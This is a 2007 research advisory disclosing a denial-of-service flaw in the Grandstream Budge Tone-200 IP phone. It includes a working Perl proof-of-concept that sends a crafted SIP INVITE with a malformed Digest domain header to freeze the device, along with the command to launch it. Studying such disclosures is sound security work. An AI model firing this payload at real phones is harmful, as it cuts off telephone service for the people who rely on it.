Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16431
HistoryMar 22, 2007 - 12:00 a.m.

[Full-disclosure] Grandstream Budge Tone-200 denial of service vulnerability

2007-03-2200:00:00
vulners.com
18

MADYNES Security Advisory

<http://madynes.loria.fr/&gt; http://madynes.loria.fr

Title: Grandstream Budge Tone-200 denial of service vulnerability

Release Date:

  21/03/2007

Severity:

  High - Denial of  Service

Advisory ID:KIPH3

Hardware: Grandstream Budge Tone-200 IP Phone
http://www.grandstream.com/consumerphones.html

Affected Versions: Program-- 1.1.1.14 Bootloader-- 1.1.1.5

Other versions maybe.

Vulnerability Synopsis: After sending a crafted INVITE/CANCE or any message
with a "WWW-Authenticate" where the "Digest domain" is crafted the device
freezes provoking a DoS.

Impact: A remote individual can remotely crash and perform a Denial of
Service(DoS) attack in all the services provided by the software by sending
one crafted SIP INVITE message. This is conceptually similar to the "ping of
death".

Resolution: The vendor was contacted at multiple times, the complete report
was sent, but no feedback whatsoever resulted.

Vulnerability Description: the device reboots after a crafted INVITE message
had been sent.

Configuration of our device:

Software Version: Program-- 1.1.1.14 Bootloader-- 1.1.1.5

IP-Address obtained by DHCP as 192.168.1.105

The configuration is the default

Vulnerability:

After sending a crafted INVITE, CANCEL or any message with a
"WWW-Authenticate" where the "Digest domain" is crafted the device freezes
provoking a DoS.

Exploit:

To run the exploit the file invite_grandstream.pl should be launched
(assuming our configurations) as:

perl invite_grandstream.pl 192.168.1.105 5060 Fosforito

Proof of Concept Code:

#!/usr/bin/perl

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);

$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

    Proto=&gt;&#39;udp&#39;,

    PeerAddr=&gt;$ARGV[0]&#41;;

$AUTH = "WWW-Authenticate: Digest
domain=\"/-+:\@=\$\%D6\$;\$=;=\$=\$,\@\$.=;\@;;,&&+:::=\@/2\$&;6+;+=\%A5==;\
@:=;\$&\%A3:u,\@=\@;&;\@+::+&;+,&/&\@=,;=&:&,=&:;:;;K+&\@=\%DA*\$;\@&+&:;/=
=\%37:\%A6;,\@\%ED,:=:\@,;\%DA;&\$)\$+=;+:\%FE\$:\@;&=,W;,g\%EF;\%FB:+\@O\$+
\%AF+;+:,&=\%CA\%EA;\$,\@+/;\@,-;:;,P&\@;_\$:\%C7&+&/!,\%EE\$:,\@:;;\@&\@,+,
z\@\$;\@\@\$\$::\@/=,\$3\%ED=\@+\%AE/=&\@;;\$;&\$\%FE:\@;\$+:\$\%EB\$=&:;&K&
;:\@\%EA,=\%BA6\%21;=&:\$\"\r\n";

$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=z9hG4bK056a27e7;rport\r\nFrom:
<sip:tucu\@192.168.1.2>;tag=as011d1185\r\nTo:
<sip:$ARGV[2]\@$ARGV[0]>;$TOTAG\r\n$AUTH\CSeq: 6106 INVITE\r\Max-Forwards:
70\r\nContent-Length: 0\r\n\r\n";

$socket->send($msg);

Credits:

  Humberto J. Abdelnur &#40;Ph.D Student&#41;

  Radu State &#40;Ph.D&#41;

  Olivier Festor &#40;Ph.D&#41;

  This vulnerability was identified by the Madynes research team at

INRIA

  Lorraine, using the Madynes VoIP fuzzer.

   &lt;http://madynes.loria.fr/&gt; http://madynes.loria.fr/

Disclosure Distribution:

  The advisory will be posted on the following websites:

  

   &lt;http://madynes.loria.fr/&gt; http://madynes.loria.fr website



  The advisory will be posted to the following mailing lists:



  1&#41;    [email protected]

  2&#41;    [email protected]

Information about us: Madynes is a research team at INRIA Lorraine working
on VoIP Security assessment, intrusion detection and prevention.